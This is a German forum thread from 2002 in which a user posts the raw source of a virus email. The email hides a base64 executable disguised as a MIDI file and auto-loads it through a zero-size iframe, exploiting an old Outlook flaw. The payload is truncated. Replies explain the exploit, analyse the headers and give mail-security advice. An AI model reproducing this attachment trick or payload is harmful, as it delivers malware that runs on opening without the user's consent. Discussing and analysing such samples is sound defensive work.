AnalphaBestie: Virus

Hiho

heute bekam ich eine email mit dem Betreff
LinksradikalerPunker

Als ich die email anklickte kam für eine sekunde ein download fenster, ohne das ich irgendwas bestätigen musste.

Das system war grade neu deswegen noch keine protection :)

Ist das eigentlich normal bei outlook ? man sollte wahrscheinlich HTML in emails austellen...

Für alle die es interresiert ist hier der quelltext:

-----------------------------------------------------------------

Return-Path: 520093760782-0001@t-online.de
Received: from mailout08.sul.t-online.com (mailout08.sul.t-online.com [194.25.134.20])
 by lithium.one-2-one.net (8.11.0/8.11.0) with ESMTP id g4VF1fU08089
 for AnalphaBestie@ackro.com; Fri, 31 May 2002 17:01:41 +0200
Received: from fwd00.sul.t-online.de
 by mailout08.sul.t-online.com with smtp
 id 17DnsB-0007DG-00; Fri, 31 May 2002 16:59:23 +0200
Received: from Opddnuxrt (520093760782-0001@[80.139.56.35]) by fwd00.sul.t-online.com
 with smtp id 17DnqH-1OSmRsC; Fri, 31 May 2002 16:57:25 +0200
From: 520093760782-0001@t-online.de (LinksradikalerPunker)
To: AnalphaBestie@ackro.com
Subject: Questionnaire
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary=O62J6s6g163N0
Date: Fri, 31 May 2002 16:57:25 +0200
Message-ID: 17DnqH-1OSmRsC@fwd00.sul.t-online.com
X-Sender: 520093760782-0001@t-dialin.net
Status:

--O62J6s6g163N0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:J1bV1q788nQ height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--O62J6s6g163N0
Content-Type: audio/x-midi;
 name=nets .exe
Content-Transfer-Encoding: base64
Content-ID: <J1bV1q788nQ>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
dAmBffRdAQAAfgfHRfRdAQAAgz0cLEEAAX4MagRT6Anz//9ZWesLoRAqQQCKBFiD4ASFwHQh
i0X0/030hcB0F/9F5IgeRv9F/FfocAcAAIvYWYld7Ou7OB0gLEEAdWaLRfT/TfSFwHRc/0X8
V+hNBwAAi9igICxBAIgGWYld7EaDPRwsQQABfgxqBFPom/L//1lZ6wuhECpBAIoEWIPgBIXA
dCGLRfT/TfSFwHQX/0XkiB5G/0X8V+gCBwAAi9hZiV3s67uDfeQAD4SOAAAAg/tldAmD+0UP
hYAAAACLRfT/TfSFwHR2xgZlRv9F/FfoywYAAIvYWYP7LYld7HUFiAZG6wWD+yt1HotF9P9N
AAAAycO4/HZNAOivCQsAg+wU

--- NOCH MEHR BUSCHSTABEN SALTA ---

U1ZXaKkEAADoV4sMAIvYizX4dk4AjUXkx0XkTgAAAFBqAWiSAQAA/3Mc/9aNRehQ6IkMAACD
fegAWXUOagLoGpQMAIlF6IAgAFn/dejo
--O62J6s6g163N0
--O62J6s6g163N0
Content-Type: application/octet-stream;
 name=SmartSaverPro-4x2[1].jpg
Content-Transfer-Encoding: base64
Content-ID: <J1bV1q788nQ>

/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoM
DAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsN
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wgAR
CAB9AIIDASIAAhEBAxEB/8QAHAAAAwADAQEBAAAAAAAAAAAAAAUGAgQHAwEI/8QAHAEAAQUB
AQEAAAAAAAAAAAAAAAEDBAUGAgcI/9oADAMBAAIQAxAAAAHordNsVV6/l6lIz3jspqm9rplk
nY4vQ++ntJI1lsuETvhMk7ZKG5oY+siZfEWVVKjd+L/1TIeeaR/jNLG1U7lt6XZ22inE3c5K
9VQyp3LndBTInPcr7ddb5Up6GjYlxBQCSe6z1PzLS+QsXCtXk/QdzP7HraWma/V44YOJekSf
BVsdfrH9EjPciSPNE13BZMiDQafo+HZc73525PoVXDc3vK3inY+XMzGezMUrO66BhzeqWn+o
8OeS4/Z1cXmjvQJTw+cv1RLjDf7dVTZrvP3XgtG3V3xiJC0vTZOZkh6blRkdTwmj9un9WHJ/
LqSuLwpgdq8nSfY6SZPE8aA9x0gAAAAAC6cpNKnd9EzP5zywnWf1OaGAd5IlMTZFjPQNNJAA
/0
4pRzyi5Fvf1hgK/GCm/pj4n1hDh9YaJ+mGD+M+L/AMF//9=9
--O62J6s6g163N0--

gekürzt wie sau

Gute nacht

  1. Hi,

    Das system war grade neu deswegen noch keine protection :)

    Das ist, äh - suboptimal.

    Ist das eigentlich normal bei outlook ? man sollte wahrscheinlich
    HTML in emails austellen...

    HTML selbst enthält keinen ausführbaren Code.

    Abschalten solltest Du alles, was der Mail client-seitige Intelligenz
    auf Deiner Maschine erlaubt: JavaScript, JScript, ActiveX, ...

    Viele Grüße
          Michael

  2. Hallo AnalphaBestie,

    Ist das eigentlich normal bei outlook ? man sollte wahrscheinlich HTML in emails austellen...

    Naja, ganz blöd gesagt:
    Besser wäre wohl Outlook als solches abzustellen, es gibt jede Menge Mail-Programme die nicht der Meinung sind jeden Müll, der in einer Mail vorhanden ist, ausführen zu müssen.

    Gruß
    der_bernd

  3. Moin!

    <HTML><HEAD></HEAD><BODY>
    <iframe src=3Dcid:J1bV1q788nQ height=3D0 width=3D0>
    </iframe>
    <FONT></FONT></BODY></HTML>

    --O62J6s6g163N0
    Content-Type: audio/x-midi;
    name=nets .exe
    Content-Transfer-Encoding: base64
    Content-ID: <J1bV1q788nQ>

    Uralter Virus, der einen uralten Bug in Outlook ausnutzt. Ueber einen IFRAME wird eine Datei eingebunden, die aber kein HTML ist, sondern eine ausfuehrbare Datei. Abhilfe: Outlook loeschen und stattdessen ein Mailprogramm installieren.

    So long

    --
    Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning.
        -- Rich Cook

  4. Hiho

    Moin Moin !

    Für alle die es interresiert ist hier der quelltext:


    Wenn Du den Verursacher packen willst, wende Dich an T-Online. Der Troll war nämlich so blöd, den Unsinn von (s)einem T-Online-Account zu machen, man beachte die unterstrichenen Zeilen.

    Die Mail kommt definitiv von T-Online (1,2,3,5), der Absender hat sich nichtmal groß Mühe gemacht, den Absender zu verändern (0,4), und Du hast seine T-Online-Accountnummer (5). Die X-Sender-Zeile (5) kann man innerhalb von T-Online (siehe Liste der beteiligten Mailserver (1,2,3)) nicht faken!

    Entweder schickst Du dem A....bsender eine freundliche Mail, oder Du wendest Dich an T-Online und weist sie auf ein (weiteres) schwarzes Schaf hin.

    Alexander

    Return-Path: 520093760782-0001@t-online.de

    (0) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    Received: from mailout08.sul.t-online.com (mailout08.sul.t-online.com [194.25.134.20])

    (1) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    by lithium.one-2-one.net (8.11.0/8.11.0) with ESMTP id g4VF1fU08089
    for AnalphaBestie@ackro.com; Fri, 31 May 2002 17:01:41 +0200
    Received: from fwd00.sul.t-online.de

    (2) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    by mailout08.sul.t-online.com with smtp

    (2) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    id 17DnsB-0007DG-00; Fri, 31 May 2002 16:59:23 +0200
    Received: from Opddnuxrt (520093760782-0001@[80.139.56.35]) by fwd00.sul.t-online.com

    (3) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    with smtp id 17DnqH-1OSmRsC; Fri, 31 May 2002 16:57:25 +0200
    From: 520093760782-0001@t-online.de (LinksradikalerPunker)

    (4) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    To: AnalphaBestie@ackro.com
    Subject: Questionnaire
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary=O62J6s6g163N0
    Date: Fri, 31 May 2002 16:57:25 +0200
    Message-ID: 17DnqH-1OSmRsC@fwd00.sul.t-online.com
    X-Sender: 520093760782-0001@t-dialin.net

    (5) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    Status:

    [...]

    1. Tach auch,

      Wenn Du den Verursacher packen willst, wende Dich an T-Online. Der Troll war nämlich so blöd, den Unsinn von (s)einem T-Online-Account zu machen, man beachte die unterstrichenen Zeilen.

      Aeh, ich glaube Du uebersiehst da was: Der Absender ist wahrscheinlich von dem Virus infiziert und weiss moeglicherweise noch nicht mal von seinem Glueck.

      Der eigentliche Verursacher sitzt wahrscheinlich ganz woanders und lacht sich ins Faeustchen wenn Du hinter tausenden von infizierten Leuten hergehst.

      Mal ganz davon abgesehen dass moeglicherweise mehrere Leute jetzt Post von AnalphaBestie haben mit genau dem gleichen Virus. Und AnalphaBestie als Absender...

      Die Mail kommt definitiv von T-Online (1,2,3,5), der Absender hat sich nichtmal groß Mühe gemacht, den Absender zu verändern (0,4),

      Logisch, der wollte die mail mit einiger Wahrscheinlichkeit auch gar nicht senden...

      und Du hast seine T-Online-Accountnummer (5).

      Dann kannst Du ihn wenigstens informieren.

      Entweder schickst Du dem A....bsender eine freundliche Mail, oder Du wendest Dich an T-Online und weist sie auf ein (weiteres) schwarzes Schaf hin.

      Und Du glaubst T-Online interessiert sich dafuer dass einer Ihrer Kunden mit einem Virus infiziert ist? Da duerfte es Tausende geben...

      Gruss,
      Armin

      1. Tach auch,

        Moin Moin !

        Wenn Du den Verursacher packen willst, wende Dich an T-Online. Der Troll war nämlich so blöd, den Unsinn von (s)einem T-Online-Account zu machen, man beachte die unterstrichenen Zeilen.

        Aeh, ich glaube Du uebersiehst da was: Der Absender ist wahrscheinlich von dem Virus infiziert und weiss moeglicherweise noch nicht mal von seinem Glueck.

        Ja, ist mir 10 Sekunden nach dem Posten auch eingefallen. Ist halt noch etwas früh! ;-)

        Der eigentliche Verursacher sitzt wahrscheinlich ganz woanders und lacht sich ins Faeustchen wenn Du hinter tausenden von infizierten Leuten hergehst.

        Mal ganz davon abgesehen dass moeglicherweise mehrere Leute jetzt Post von AnalphaBestie haben mit genau dem gleichen Virus. Und AnalphaBestie als Absender...

        Die Mail kommt definitiv von T-Online (1,2,3,5), der Absender hat sich nichtmal groß Mühe gemacht, den Absender zu verändern (0,4),

        Logisch, der wollte die mail mit einiger Wahrscheinlichkeit auch gar nicht senden...

        und Du hast seine T-Online-Accountnummer (5).

        Dann kannst Du ihn wenigstens informieren.

        Sollte AnalphaBestie auch machen.

        Entweder schickst Du dem A....bsender eine freundliche Mail, oder Du wendest Dich an T-Online und weist sie auf ein (weiteres) schwarzes Schaf hin.

        Und Du glaubst T-Online interessiert sich dafuer dass einer Ihrer Kunden mit einem Virus infiziert ist? Da duerfte es Tausende geben...

        Wie gesagt, es ist noch etwas früh. Den Satz habe ich geschrieben, als ich dem Absender böse Absichten unterstellt habe.

        Und was haben wir heute morgen gelernt ?

        1. Erst zuende denken, dann posten.
        2. Niemals mit Outlook Mails abrufen (zumindest nicht, bevor man es halbwegs sicher eingestellt hat).

        Alexander

        Gruss,
        Armin

        1. Tach auch,

          Ja, ist mir 10 Sekunden nach dem Posten auch eingefallen. Ist halt noch etwas früh! ;-)

          Lahme Ausrede, bei mir ist es erst 8:00 und ich bin schon wach ;-)

          1. Niemals mit Outlook Mails abrufen (zumindest nicht, bevor man es halbwegs sicher eingestellt hat).

          Wie jetzt? Geht das neuerdings? Halbwegs sicher einstellen, meine ich. SCNR

          Obwohl ich beichten muss dass ich bis vor 6 Monaten auch Outlook benutzt habe. Aber man lernt ja.

          Gruss,
          Armin

      2. Hi

        Mal ganz davon abgesehen dass moeglicherweise mehrere Leute jetzt Post von AnalphaBestie haben mit genau dem gleichen Virus. Und AnalphaBestie als Absender...

        Dann kannst Du ihn wenigstens informieren.

        Entweder schickst Du dem A....bsender eine freundliche Mail,

        macht auch nicht viel Sinn. Eine Reihe der Viren gibt als Absender eine beliebige Emailadresse aus dem Adressbuch oder von gespeicherten Webseiten (einschließlich Cache) die sich auf dem Rechner befinden an und verschickt sich auch an diese.

        Ich kriege öfter mal die Mitteilung ich hätte ein Virus. Dabei verwende ich Outlook gar nicht. :-)

        Ich z.B. habe mir mittlerweile angewöhnt, die ersten Zeilen jeder Mail anzuschauen (manchmal reicht schon das Subject) und lösche bei Verdacht bereits auf dem Server. Ich habe nämlich keine Lust riesige Mails (wo sind die Zeiten hin, als Viren noch klein waren) auf den Rechner zu laden, um sie dann zu löschen.

        Outlook muß nicht unbedingt deinstalliert werden. Es reicht schon, wenn man die Vorschau deaktiviert und sich regelmäßig die Sicherheitsupdates holt.

        Viele Grüße

        Antje

        1. Hallo Antje,

          macht auch nicht viel Sinn. Eine Reihe der Viren gibt als Absender eine
          beliebige Emailadresse aus dem Adressbuch oder von gespeicherten Webseiten
          (einschließlich Cache) die sich auf dem Rechner befinden an und verschickt
          sich auch an diese.

          Antje, jetzt muss ich dich aber ruegen ;-) Du hast den Beitrag von Alexander
          nicht richtig gelesen. Er hat geschrieben, dass man

          X-Sender: 520093760782-0001@t-dialin.net

          innerhalb des T-Online-Netzes nicht faken kann. Das es von T-Online aus
          geschickt wurde geht ja aus mehreren Indizien hervor. Und damit hat man die
          T-Online-Nummer und gleichzeitig die EMail-Adresse (T-Online-Nummer +
          '@t-online.de').

          Nix fuer Ungut, Gruesse,
           CK

        2. Hallo Antje,

          »»Ich z.B. habe mir mittlerweile angewöhnt, die ersten Zeilen jeder Mail anzuschauen (manchmal reicht schon das Subject) und lösche bei Verdacht bereits auf dem Server. Ich habe nämlich keine Lust riesige Mails (wo sind die Zeiten hin, als Viren noch klein waren) auf den Rechner zu laden, um sie dann zu löschen.
          Dumme Frage von mir: Wie lese ich die Mails auf dem Server?
          Mein E-Mail-Programm ist der Netscape Messenger, da muss ich doch wohl die E-Mails erst runterladen, wenn ich den Absender und den Betreff sehen will. Allerdings lösche ich grundsätzlich alle verdächtigen E-Mails, ohne sie zu öffnen (und verdächtige Attachments ohnehin nicht).
          Und mein Antivirenprogramm (AVK 11 von Gdata) prüft neuerdings vor dem Runterladen alle eingehenden E-Mails (Hoffentlich! Bisher wurde noch kein Virenalarm ausgelöst)).

          Viele Grüße
          Antje

          Auch viele Grüsse
          erika

          1. Hallo,

            Ich z.B. habe mir mittlerweile angewöhnt, die ersten Zeilen jeder Mail
            anzuschauen (manchmal reicht schon das Subject) und lösche bei Verdacht
            bereits auf dem Server. Ich habe nämlich keine Lust riesige Mails (wo
            sind die Zeiten hin, als Viren noch klein waren) auf den Rechner zu laden,
            um sie dann zu löschen.

            Dumme Frage von mir: Wie lese ich die Mails auf dem Server?
            Mein E-Mail-Programm ist der Netscape Messenger, da muss ich doch wohl die E-Mails erst runterladen,

            Auch im Netscape Messenger gibt es eine solche Einstellung. Man kann die Größe begrenzen. Wenn Du beispielsweise 50kB einstellt, dann werden nur maximal 50kB pro Mail heruntergeladen und der Rest erst nach einem weiteren Klick.
            Wo die Einstellung genau ist, kann ich Dir nicht genau sagen. Ist aber irgendwo bei den Einstellungen :-)

            Und mein Antivirenprogramm (AVK 11 von Gdata) prüft neuerdings vor dem Runterladen alle eingehenden E-Mails (Hoffentlich! Bisher wurde noch kein Virenalarm ausgelöst)).

            Jo. Zum Glück.

            Gruß
               MichaelB

            1. Hallo und danke,

              Auch im Netscape Messenger gibt es eine solche Einstellung. Man kann die Größe begrenzen. Wenn Du beispielsweise 50kB einstellt, dann werden nur maximal 50kB pro Mail heruntergeladen und der Rest erst nach einem weiteren Klick.
              Wo die Einstellung genau ist, kann ich Dir nicht genau sagen. Ist aber irgendwo bei den Einstellungen :-)

              Die Einstellung lautet: Bearbeiten/Einstellungen/Mail&Diskussionsforen/Speicherplatz/ Alle Nachrichten -->Häkchen bei "Keine Nachrichten lokal speichern,die größer sind als ....KB"
              Ich kann das aber nicht nutzen, denn ich bekomme regelmäßig Manuskripte (einschl. Attachments) mit 100 bis über 300 KB, die kann ich doch nicht aussperren!
              Da hilft nur auf Gott vertraun und auf ein gutes Antivirenprogramm. AVK 11 ist wachsam und meldet treu und brav vor dem Runterladen: "Prüfe eingehende Mails!"

              Einen schönen Samstagabend wünscht
              erika

          2. Hallo Erika

            Dumme Frage von mir: Wie lese ich die Mails auf dem Server?

            Mein Mailprogramm besitzt ein dafür ein Plugin. ICQ ebenso. Es gibt auch noch andere Alternativen. Suche mal bei google nach email + checker.

            Viele Grüße

            Antje

            1. Dumme Frage von mir: Wie lese ich die Mails auf dem Server?

              Mein Mailprogramm besitzt ein dafür ein Plugin. ICQ ebenso. Es gibt auch noch andere Alternativen. Suche mal bei google nach email + checker.

              Danke Antje für diesen Hinweis.

              Was es alles so gibt, man lernt nie aus.
              Uns morgen ist Sonntag und es soll laut Wetterbericht tatsächlich ein Sonnentag werden.
              Nutzen wir das schöne Wetter zur Erholung, ehe wir nächste Woche wieder auf Virenjagd gehen.

              Viele Grüße
              erika